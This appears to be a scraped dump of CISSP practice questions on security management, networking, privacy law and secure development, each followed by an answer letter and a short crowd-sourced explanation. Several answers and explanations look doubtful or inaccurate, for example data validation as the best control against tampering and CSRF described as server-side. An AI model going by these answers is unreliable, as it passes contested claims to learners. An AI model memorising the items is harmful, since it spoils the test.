Which Wide Area Network (WAN) technology requires the first router in the path to determine the full path the packet will travel, removing the need for other routers in the path to make independent determinations? A. Synchronous Optical Networking (SONET) B. Multiprotocol Label Switching (MPLS) C. Fiber Channel Over Ethernet (FCoE) D. Session Initiation Protocol (SIP)

B. Multiprotocol label switching (MPLS) is a technique for speeding up network connections that was first developed in the 1990s. The public Internet functions by forwarding packets from one router to the next until the packets reach their destination. MLPS, on the other hand, sends packets along predetermined network paths. Ideally, the result is that routers spend less time deciding where to forward each packet, and packets take the same path every time. Consider the process of planning a long drive. Instead of identifying which towns and cities one must drive through in order to reach the destination, it is usually more efficient to identify the roads that go in the correct direction. Similarly, MPLS identifies paths — network "roads" — rather than a series of intermediary destinations. https://www.cloudflare.com/learning/network-layer/what-is-mpls/

What is a security concern when considering implementing software-defined networking (SDN)? A. It has a decentralized architecture. B. It increases the attack footprint. C. It uses open source protocols. D. It is cloud based.

B. "A significant issue regarding SDN security is that virtualizing every aspect of the network infrastructure increases your attack footprint. " SDN introduces a centralized controller that manages the network infrastructure and allows for dynamic and programmable network configurations. While SDN offers advantages in terms of flexibility and automation, it also expands the attack surface of the network. With SDN, there is a single point of control that, if compromised, can have a significant impact on the entire network. The centralized nature of SDN makes it an attractive target for attackers. If they can gain unauthorized access to the SDN controller or exploit vulnerabilities in the controller software, they may be able to manipulate network configurations, redirect traffic, or launch attacks on other network components. https://www.networkworld.com/article/3245173/secure-your-sdn-controller.html

Which of the following is security control volatility? A. A reference to the impact of the security control. B. A reference to the likelihood of change in the security control. C. A reference to how unpredictable the security control is. D. A reference to the stability of the security control.

B. A reference to the likelihood of change in the security control. Here's what security control volatility means: Definition: Security control volatility refers to how frequently a security control might need to be changed or updated over time. This could be due to factors like: Evolving threats and vulnerabilities Changes in technology New regulations or compliance requirements Organizational shifts in business needs Why other options are not correct: A. A reference to the impact of the security control: Impact refers to the potential consequences or effects of the security control itself, not its volatility. C. A reference to how unpredictable the security control is: Unpredictability implies randomness or a lack of reliability, which is not the focus of volatility. D. A reference to the stability of the security control: Stability is the opposite of volatility. A control with low volatility would be considered more stable.

Which of the following threats would be MOST likely mitigated by monitoring assets containing open source libraries for vulnerabilities? A. Distributed denial-of-service (DDoS) attack B. Advanced persistent threat (APT) attempt C. Zero-day attack D. Phishing attempt

B. Advanced persistent threat (APT) attempt

An organization is setting a security assessment scope with the goal of developing a Security Management Program (SMP). The next step is to select an approach for conducting the risk assessment. Which of the following approaches is MOST effective for the SMP? A. Security controls driven assessment that focuses on controls management B. Business processes based risk assessment with a focus on business goals C. Asset driven risk assessment with a focus on the assets D. Data driven risk assessment with a focus on data

B. Business process-based risk assessment with a focus on business objectives. This approach ensures that risk assessment is aligned with business objectives and needs, enabling risk management that directly supports the organization's strategic objectives. By focusing on business processes, the organization can better understand how security risks affect its operations, and make informed decisions to mitigate these risks appropriately. https://www.ifc.org/content/dam/ifc/doc/mgrt/p-handbook-securityforces-2017.pdf https://policy.un.org/sites/policy.un.org/files/files/documents/2020/Oct/spm_-_chapter_iv_-_section_a_-_security_risk_management_2.pdf

What is the term used to define where data is geographically stored in the cloud? A. Data privacy rights B. Data sovereignty C. Data warehouse D. Data subject rights

B. Data sovereignty Data sovereignty refers to the legal and regulatory requirements that determine the physical location or jurisdiction in which data is stored, processed, and managed. It relates to the concept that data is subject to the laws and regulations of the country or region in which it resides. When data is stored in the cloud, organizations must consider data sovereignty to ensure compliance with applicable laws and regulations, as different countries may have different requirements regarding data privacy, security, and access. Data sovereignty addresses concerns about data protection, data privacy rights, and the control and ownership of data.

A database server for a financial application is scheduled for production deployment. Which of the following controls will BEST prevent tampering? A. Data sanitization B. Data validation C. Service accounts removal D. Logging and monitoring

B. Data validation

When assessing the audit capability of an application, which of the following activities is MOST important? A. Identify procedures to investigate suspicious activity. B. Determine if audit records contain sufficient information. C. Verify if sufficient storage is allocated for audit records. D. Review security plan for actions to be taken in the event of audit failure.

B. Determine if audit records contain sufficient information.

Which of the following is the PRIMARY reason for selecting the appropriate level of detail for audit record generation? A. Avoid lengthy audit reports B. Enable generation of corrective action reports C. Facilitate a root cause analysis (RCA) D. Lower costs throughout the System Development Life Cycle (SDLC)

B. Enable generation of corrective action reports Auditing is the programmatic means by which a subject's actions are tracked and recorded for the purpose of holding the subject accountable for their actions while authenticated on a system through the documentation or recording of subject activities. It is also the process by which unauthorized or abnormal activities are detected on a system. Auditing is recording activities of a subject and its objects as well as recording the activities of application and system functions. Log files provide an audit trail for re-creating the history of an event, intrusion, or system failure. Auditing is needed to detect malicious actions by subjects, attempted intrusions, and system failures and to reconstruct events, provide evidence for prosecution, and produce problem reports and analysis."

Which of the following is an indicator that a company's new user security awareness training module has been effective? A. There are more secure connections to internal e-mail servers. B. More incidents of phishing attempts are being reported. C. Fewer incidents of phishing attempts are being reported. D. There are more secure connections to the internal database servers.

B. More incidents of phishing attempts are being reported. If users are more aware, then they should be reporting MORE instances of phishing attempts.

In the "Do" phase of the Plan-Do-Check-Act model, which of the following is performed? A. Maintain and improve the Business Continuity Management (BCM) system by taking corrective action, based on the results of management review. B. Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement. C. Ensure the business continuity policy, controls, processes, and procedures have been implemented. D. Ensure that business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity have been established.

C Plan = Plan Do = Perform Act = Improve Check = Monitor PLAN - D. Ensure that business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity have been established. DO - C. Ensure the business continuity policy, controls, processes, and procedures have been implemented. ACT - A. Maintain and improve the Business Continuity Management (BCM) system by taking corrective action, based on the results of management review. Check - B. Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement.

What is considered the BEST explanation when determining whether to provide remote network access to a third-party security service? A. Contract negotiation B. Supplier request C. Business need D. Vendor demonstration

C Providing remote network access to a third-party security service is a decision that should be made based on the specific business needs and the risks involved. It is important to evaluate the requirements for the service and whether it is critical for the business operations.

When resolving ethical conflicts, the information security professional MUST consider many factors. In what order should the considerations be prioritized? A. Public safety, duties to individuals, duties to the profession, and duties to principals B. Public safety, duties to principals, duties to the profession, and duties to individuals C. Public safety, duties to principals, duties to individuals, and duties to the profession D. Public safety, duties to the profession, duties to principals, and duties to individuals

C Treat all members fairly. In resolving conflicts, consider public safety and duties to principals, individuals and the profession in that order. https://resources.infosecinstitute.com/certification/the-isc2-code-of-ethics-a-binding-requirement-for-certification/

Which of the following BEST describes the purpose of software forensics? A. To analyze possible malicious intent of malware B. To perform cyclic redundancy check (CRC) verification and detect changed applications C. To determine the author and behavior of the code D. To review program code to determine the existence of backdoors

C To determine the author and behavior of the code Software forensics is the science of analyzing software source code or binary code to determine whether intellectual property infringement or theft occurred. It is the centerpiece of lawsuits, trials, and settlements when companies are in dispute over issues involving software patents, copyrights, and trade secrets. Software forensics tools can compare code to determine correlation, a measure that can be used to guide a software forensics expert.

What is the FIRST step that should be considered in a Data Loss Prevention (DLP) program? A. Policy creation B. Information Rights Management (IRM) C. Data classification D. Configuration management (CM)

C) Data classification The first stage of DLP is discovery and classification. Discovery is the process of finding all instances of data, while classification is the act of categorizing that data based on its sensitivity and value to the organization. While you should have classified your data as part of your information asset inventory, many DLP tools are capable of applying signature-based logic that determines the classification of data. In many cases, your existing classification information can be used to "tune" the DLP to know what you consider sensitive. Examples of classifications might include "PCI data" (or "cardholder data"), "Social Security numbers," "PHI," and so on. Comprehensive discovery and proper classification is critical to the effectiveness of the remaining stages and to the success of your overall DLP implementation.

Which change management role is responsible for the overall success of the project and supporting the change throughout the organization? A. Change driver B. Project manager C. Program sponsor D. Change implementer

C) Program Sponsor Key phrase in question was "supporting the change throughout the organization" Project sponsor vs. project manager: Both the project sponsor and project manager are highly involved in the project and responsible for the outcome and success. The project sponsor is the point of connection between the organization's executive team and the project manager; the project manager is the point of connection between the project sponsor and the project team. Project sponsor is responsible for the overall success of a project by providing financing and supportive resources, while a project manager oversees a project's day-to-day management by managing tasks, team members, and project progress.

When reviewing vendor certifications for handling and processing of company data, which of the following is the BEST Service Organization Controls (SOC) certification for the vendor to possess? A. SOC 1 Type 1 B. SOC 2 Type 1 C. SOC 2 Type 2 D. SOC 3

C. When reviewing vendor certifications for handling and processing of company data, the best Service Organization Controls (SOC) certification for the vendor to possess is the SOC 2 Type II certification. This certification is the most stringent in regards to data security and privacy, and is the most highly sought after by companies. It provides assurance that the vendor has appropriate processes, procedures, and controls in place for the data that they process. It also provides assurance to customers that the vendor is upholding the standards set by the American Institute of Certified Public Accountants (AICPA). The SOC 2 Type II certification is the gold standard in regards to data security and privacy, and is the best certification a vendor can possess. There is no type 1 or 2 for SOC 3, and it's used high-level report generally available on public domain/ website. SOC 1 & 2 has type 1 and type 2. Type 1 is the design of control while Type 2 is the effectiveness of the control.

Why is data classification control important to an organization? A. To enable data discovery B. To ensure security controls align with organizational risk appetite C. To ensure its integrity, confidentiality and availability D. To control data retention in alignment with organizational policies and regulation

C. You don't perform Data classification to ensure that "security controls" are aligned with the organisational risk appetite. It doesn't make sense. You implement data classification to ensure that only individuals at specific clearance levels have access to read/write to specific sets of classified data (Confidentiality). Classifying the data would then In-turn, prove to be integral, & the availability piece would then be applicable

Under the General Data Protection Regulation (GDPR), what is the maximum amount of time allowed for reporting a personal data breach? A. 24 hours B. 48 hours C. 72 hours D. 96 hours

C. 72 hours

A security architect is developing an information system for a client. One of the requirements is to deliver a platform that mitigates against common vulnerabilities and attacks. What is the MOST efficient option used to prevent buffer overflow attacks? A. Access control mechanisms B. Process isolation C. Address Space Layout Randomization (ASLR) D. Processor states

C. Address Space Layout Randomization (ASLR) Address space layout randomization (ASLR) is a memory-protection process for operating systems (OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.

Compared to a traditional network, which of the following is a security-related benefit that software-defined networking (SDN) provides? A. Centralized network provisioning B. Reduced network latency when scaled C. Centralized network administrative control D. Reduced hardware footprint and cost

C. Centralized network administrative control

An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred? A. SQL injection (SQLi) B. Extensible Markup Language (XML) external entities C. Cross-Site Scripting (XSS) D. Cross-Site Request Forgery (CSRF)

C. Cross-Site Scripting (XSS) XSS happen on client side. CSRF happening on web server side XSS: </sript> to load on browser An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. https://owasp.org/www-community/attacks/xss/ https://owasp.org/www-community/attacks/csrf

The existence of physical barriers, card and personal identification number (PIN) access systems, cameras, alarms, and security guards BEST describes this security approach? A. Access control B. Security information and event management (SIEM) C. Defense-in-depth D. Security perimeter

C. Defense-in-depth This is a comprehensive strategy that integrates multiple layers of security, including both physical and logical controls. The description given fits this approach as it includes multiple layers of physical security measures.

What is the FIRST step when developing an Information Security Continuous Monitoring (ISCM) program? A. Collect the security-related information required for metrics, assessments, and reporting. B. Establish an ISCM program determining metrics, status monitoring frequencies, and control assessment frequencies. C. Define an ISCM strategy based on risk tolerance. D. Establish an ISCM technical architecture.

C. Define an ISCM strategy based on risk tolerance.

A company is enrolled in a hard drive reuse program where decommissioned equipment is sold back to the vendor when it is no longer needed. The vendor pays more money for functioning drives than equipment that is no longer operational. Which method of data sanitization would provide the most secure means of preventing unauthorized data loss, while also receiving the most money from the vendor? A. Pinning B. Single-pass wipe C. Multi-pass wipes D. Degaussing

C. Multi-pass wipes Degaussing a hard disk will normally destroy the electronics used to access the data. However, you won't have any assurance that all the data on the disk has actually been destroyed. Someone could open the drive in a clean room and install the platters on a different drive to read the data. Purging is a more intense form of clearing that prepares media for reuse in less secure environments. It provides a level of assurance that the original data is not recoverable using any known methods. A purging process will repeat the clearing process multiple times and may combine it with another method, such as degaussing, to completely remove the data.

Which of the following is the PRIMARY purpose of installing a mantrap within a facility? A. Control traffic B. Control air flow C. Prevent piggybacking D. Prevent rapid movement

C. Prevent Piggybacking

Which of the following technologies can be used to monitor and dynamically respond to potential threats on web applications? A. Field-level tokenization B. Web application vulnerability scanners C. Runtime application self-protection (RASP) D. Security Assertion Markup Language (SAML)

C. Runtime application self-protection (RASP) RASP and Cloud Security RASP is an important component within the organization's cloud security strategy, more particularly for cloud application security. As companies increasingly leverage the cloud to advance business transformation efforts, enable new business models and activate a remote workforce, they must also ensure that all business conducted in a cloud or hybrid environment is safe and secure. Traditional security measures are not equipped to deliver protection in the cloud, which means that organizations must craft a new strategy and adopt new tooling, including application-level policies, tools, technologies and rules — chief among them RASP — to maintain visibility into all cloud-based assets, protect cloud-based applications from cyberattacks and limit access only to authorized users.

Which of the following is a common term for log reviews, synthetic transactions, and code reviews? A. Application development B. Spiral development functional testing C. Security control testing D. DevOps Integrated Product Team (IPT) development Reveal Solution Discussion 6

C. Security Control Testing Organizations must manage the security control testing that occurs to ensure that all security controls are tested thoroughly by authorized individuals. The facets of security control testing that organizations must include are vulnerability assessments, penetration testing, log reviews, synthetic transactions, code review and testing, misuse case testing, test coverage analysis, and interface testing. Log reviews involve analyzing system logs to identify any suspicious or anomalous activities that may indicate security incidents or policy violations. Synthetic transactions refer to simulated interactions with an application or system to test its behavior and response. Code reviews involve examining the source code of an application or software to identify security vulnerabilities and ensure compliance with coding standards.

What is the MOST effective response to a hacker who has already gained access to a network and will attempt to pivot to other resources? A. Warn users of a breach. B. Reset all passwords. C. Segment the network. D. Shut down the network.

C. Segment the network

In software development, which of the following entities normally signs the code to protect the code integrity? A. The organization developing the code B. The quality control group C. The developer D. The data owner

C. The developer Code signing provides developers with a way to confirm the authenticity of their code to end users. Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer's public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals.

Which of the following is the BEST method to validate secure coding techniques against injection and overflow attacks? A. Scheduled team review of coding style and techniques for vulnerability patterns B. The regular use of production code routines from similar applications already in use C. Using automated programs to test for the latest known vulnerability patterns D. Ensure code editing tools are updated against known vulnerability patterns

C. Using automated programs to test for the latest known vulnerability patterns Using automated programs to test for the latest known vulnerability patterns.....security testing tools like dynamic and static analysis are automated and can help detect injection attacks and buffer overflow attacks among others.

International bodies established a regulatory scheme that defines how weapons are exchanged between the signatories. It also addresses cyber weapons, including malicious software, Command and Control (C2) software, and internet surveillance software. This is a description of which of the following? A. International Traffic in Arms Regulations (ITAR) B. Palermo convention C. Wassenaar arrangement D. General Data Protection Regulation (GDPR) Reveal Solution Discussion 9

C. Wassenaar arrangement The Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies is a multilateral export control regime established on 12 July 1996, in Wassenaar, near The Hague, Netherlands. According to the Wassenaar Arrangement document, it was "established to contribute to regional and international security and stability by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilizing accumulations. Participating states seek, through their national policies, to ensure that transfers of these items do not contribute to the development or enhancement of military capabilities which undermine these goals, and are not diverted to support such capabilities.

Which of the following BEST describes when an organization should conduct a black box security audit on a new software protect? A. When the organization wishes to check for non-functional compliance B. When the organization wants to enumerate known security vulnerabilities across their infrastructure C. When the organization is confident the final source code is complete D. When the organization has experienced a security incident

C. When the organization is confident the final source code is complete C is the best answer. A black box security audit tests the externally visible behavior of a system without knowledge of its internal structure and implementation. It is most useful when the final source code is complete, to check for unknown vulnerabilities before deployment.

An organization is looking to include mobile devices in its asset management system for better tracking. In which system tier of the reference architecture would mobile devices be tracked? A. 0 B. 1 C. 2 D. 3

D ITAM Reference Functionality, shows how data flows through the ITAM system. Tier 3 is composed of enterprise assets themselves. Tier 3 is made up of all of the assets being tracked including hardware, software, and virtual machines. Tier 2 includes the sensors and independent systems that feed data into the enterprise ITAM system. Tier 2 systems include passive and active collection sensor and agents. Tier 1 is the enterprise ITAM system that provides the aggregation of data from all Tier 2 systems into business and security intelligence.

Which part of an operating system (OS) is responsible for providing security interfaces among the hardware, OS, and other parts of the computing system? A. Reference monitor B. Trusted Computing Base (TCB) C. Time separation D. Security kernel

D Security Kernel In computer and communications security, the central part of a computer or communications system hardware, firmware, and software that implements the basic security procedures for controlling access to system resources. TCB : The trusted computing base (TCB) of a computer system is the set of all hardware, firmware, and/or software components that are critical to its security, in the sense that bugs or vulnerabilities occurring inside the TCB might jeopardize the security properties of the entire system. By contrast, parts of a computer system outside the TCB must not be able to misbehave in a way that would leak any more privileges than are granted to them in accordance to the security policy. Reference Monitor: reference monitor concept defines a set of design requirements on a reference validation mechanism, which enforces an access control policy over subjects' (e.g., processes and users) ability to perform operations (e.g., read and write) on objects (e.g., files and sockets) on a system. The properties of a reference monitor are captured by the acronym NEAT https://en.m.wikipedia.org/wiki/Security_kernel

When recovering from an outage, what is the Recovery Point Objective (RPO), in terms of data recovery? A. The RPO is the minimum amount of data that needs to be recovered. B. The RPO is the amount of time it takes to recover an acceptable percentage of data lost. C. The RPO is a goal to recover a targeted percentage of data lost. D. The RPO is the maximum amount of time for which loss of data is acceptable.

D. The Recovery Point Objective (RPO) is the maximum amount of time for which loss of data is acceptable in the event of an outage or disaster. The RPO defines the point in time to which data must be recovered after a disruption, indicating the acceptable level of data loss. It represents the maximum tolerable period during which data may be lost without causing significant impact or harm to the business operations or objectives. For example, if a company has an RPO of 1 hour, it means that in the event of an outage, the organization can accept a maximum data loss of up to 1 hour's worth of data. The data must be restored or recovered to a state no older than 1 hour before the incident occurred.

Which of the following BEST describes centralized identity management? A. Service providers perform as both the credential and identity provider (IdP). B. Service providers identify an entity by behavior analysis versus an identification factor. C. Service providers agree to integrate identity system recognition across organizational boundaries. D. Service providers rely on a trusted third party (TTP) to provide requestors with both credentials and identifiers.

D. Centralized access control implies that a single entity (the IdP) performs all authorization verification. Decentralized access control (also known as distributed access control) implies that various entities perform authorization verification. The Identity Provider (IdP) is a third party that holds the user authentication and authorization information. Because centralized identity management is united across all applications, the user only needs to access one console to enable a variety of services and infrastructure. For example, a Service Provider such as a bank can use an IdP like provide customers with seamless access to banking services that are externally managed, like ordering checks, sending money through a cash app, or applying for a loan. If the customer updates their address in one application, it is updated in all applications.

An organization has been collecting a large amount of redundant and unusable data and filling up the storage area network (SAN). Management has requested the identification of a solution that will address ongoing storage problems. Which is the BEST technical solution? A. Compression B. Caching C. Replication D. Deduplication

D. Deduplication is the process of eliminating redundant copies of data, which is the best solution for addressing the issue of redundant and unusable data filling up the storage area network (SAN).

Which of the following is the PRIMARY type of cryptography required to support non-repudiation of a digitally signed document? A. Hashing B. Message digest (MD) C. Symmetric D. Asymmetric

D. Asymmetric Sender encrypt message (digital signature) with private key and receive decrypt message with sender's public key. This validates integrity and Nonrepudiation.

In Federated Identity Management (FIM), which of the following represents the concept of federation? A. Collection, maintenance, and deactivation of user objects and attributes in one or more systems, directories or applications B. Collection of information logically grouped into a single entity C. Collection of information for common identities in a system D. Collection of domains that have established trust among themselves

D. Collection of domains that have established trust among themselves

What is the MOST common security risk of a mobile device? A. Data spoofing B. Malware infection C. Insecure communications link D. Data leakage

D. Data leakage

Dumpster diving is a technique used in which stage of penetration testing methodology? A. Attack B. Reporting C. Planning D. Discovery

D. Discovery The discovery stage is focused on gathering information about the target organization, its systems, and its infrastructure. This information can include both technical and non-technical data. Dumpster diving specifically involves searching through physical trash or waste disposal areas of the target organization to gather potentially sensitive or valuable information. By examining discarded documents, invoices, printouts, or other materials, an attacker can uncover valuable information such as system configurations, network diagrams, passwords, or even confidential documents. This information can then be used in subsequent stages of the penetration test to exploit vulnerabilities and gain unauthorized access to the target organization's systems.

A security professional can BEST mitigate the risk of using a Commercial Off-The-Shelf (COTS) solution by deploying the application with which of the following controls in place? A. Network segmentation B. Blacklisting application C. Whitelisting application D. Hardened configuration

D. Hardened configuration This means you remove/change configurations you don't need/want as well as change default usernames/passwords/ports/etc... Segmenting a network won't help as it would still leave the COTS exposed with defaults readily available to be exploited.

The security team is notified that a device on the network is infected with malware. Which of the following is MOST effective in enabling the device to be quickly located and remediated? A. Data loss protection (DLP) B. Intrusion detection C. Vulnerability scanner D. Information Technology Asset Management (ITAM)

D. Information Technology Asset Management (ITAM) ITAM involves tracking and managing the inventory of IT assets within an organization, including devices such as computers, servers, and network devices. By maintaining an up-to-date record of all devices, their locations, and configurations, ITAM can help identify the specific device that is infected with malware. Once the infected device is identified through ITAM, appropriate remediation actions can be taken, such as isolating the device, conducting a thorough scan for malware, applying patches or updates, or even physically removing and replacing the device if necessary.

Which service management process BEST helps information technology (IT) organizations with reducing cost, mitigating risk, and improving customer service? A. Kanban B. Lean Six Sigma C. Information Technology Service Management (ITSM) D. Information Technology Infrastructure Library (ITIL)

D. Information Technology Infrastructure Library (ITIL) The service management process that best helps IT organizations with reducing cost, mitigating risk, and improving customer service is ITIL (Information Technology Infrastructure Library). ITIL is a widely adopted framework for IT service management that provides best practices and guidelines to align IT services with the needs of the business. Within ITIL, several processes contribute to these objectives, but one of the most crucial ones is Service Level Management (SLM). SLM is responsible for defining, negotiating, documenting, monitoring, measuring, reporting, and reviewing the level of IT services provided to customers. By effectively managing service levels, IT organizations can ensure that they meet customer expectations, reduce costs by optimizing service delivery, and mitigate risks by proactively addressing issues and vulnerabilities

A colleague who recently left the organization asked a security professional for a copy of the organization's confidential incident management policy. Which of the following is the BEST response to this request? A. Access the policy on a company-issued device and let the former colleague view the screen. B. E-mail the policy to the colleague as they were already part of the organization and familiar with it. C. Do not acknowledge receiving the request from the former colleague and ignore them. D. Submit the request using company official channels to ensure the policy is okay to distribute.

D. Submit the request using company official channels to ensure the policy is okay to distribute. Option D is the most appropriate response because it ensures that proper procedures are followed for distributing sensitive organizational policies, especially after the colleague has left the organization. By submitting the request through official channels, such as contacting the appropriate personnel in the organization's administration or legal department, it allows for proper review and authorization before sharing the policy.

Physical assets defined in an organization's business impact analysis (BIA) could include which of the following? A. Personal belongings of organizational staff members B. Disaster recovery (DR) line-item revenues C. Cloud-based applications D. Supplies kept off-site a remote facility

D. Supplies kept off-site a remote facility

An international trading organization that holds an International Organization for Standardization (ISO) 27001 certification is seeking to outsource their security monitoring to a managed security service provider (MSSP). The trading organization's security officer is tasked with drafting the requirements that need to be included in the outsourcing contract. Which of the following MUST be included in the contract? A. A detailed overview of all equipment involved in the outsourcing contract B. The right to perform security compliance tests on the MSSP's equipment C. The MSSP having an executive manager responsible for information security D. The right to audit the MSSP's security process

D. The right to audit the MSSP's security process https://resources.sei.cmu.edu/asset_files/securityimprovementmodule/2003_006_001_14105.pdf

A financial organization that works according to agile principles has developed a new application for their external customer base to request a line of credit. A security analyst has been asked to assess the security risk of the minimum viable product (MVP). Which is the MOST important activity the analyst should assess? A. The software has been signed off for release by the product owner. B. The software had been branded according to corporate standards. C. The software has the correct functionality. D. The software has been code reviewed.

D. The software has been code reviewed Code review is a process of inspecting code to identify potential security vulnerabilities. It is an important part of the software development lifecycle, and it can help to prevent security breaches. The other options are not as important as code review. The software has been signed off for release by the product owner: This is important, but it does not guarantee that the software is secure. The software has been branded according to corporate standards: This is also important, but it is not as important as security. The software has the correct functionality: This is important, but it is not as important as security.

The Industrial Control System (ICS) Computer Emergency Response Team (CERT) has released an alert regarding ICS-focused malware specifically propagating through Windows-based business networks. Technicians at a local water utility note that their dams, canals, and locks controlled by an internal SupervisoryControl and Data Acquisition (SCADA) system have been malfunctioning. A digital forensics professional is consulted in the Incident Response (IR) and recovery.Which of the following is the MOST challenging aspect of this investigation? A. Group policy implementation B. SCADA network latency C. Physical access to the system D. Volatility of data

D. Volatility of data

When auditing the Software Development Life Cycle (SDLC) which of the following is one of the high-level audit phases? A. Planning B. Risk assessment C. Due diligence D. Requirements

D: Official CISSP CBK (6th edition): Software Development Auditing phases: - Requirements phase - Requirements phase - Implementation phase - Verification phase - Operation and maintenance phase

A hospital enforces the Code of Fair Information Practices. What practice applies to a patient requesting their medical records from a web portal? A. Purpose specification B. Collection limitation C. Use limitation D. Individual participation

D: Individual participation. Individual participation refers to the right of individuals to access and participate in the management of their personal information. It empowers individuals to have control over their data and allows them to exercise their rights, such as requesting access to their personal information or requesting corrections or updates to their records. In the given scenario, when a patient requests their medical records from a web portal, they are exercising their right to access their personal information. The hospital, by providing a web portal for such requests, enables individual participation and facilitates the patient's access to their medical records

In a disaster recovery (DR) test, which of the following would be a trait of crisis management? A. Process B. Anticipate C. Strategic D. Wide focus

The answer is B. Anticipate. Crisis management is the process of planning and responding to unexpected events that can have a negative impact on an organization. One of the key traits of crisis management is the ability to anticipate potential problems and develop plans to mitigate their impact. This means being able to think ahead and identify potential risks, as well as having a plan in place to deal with them if they do occur.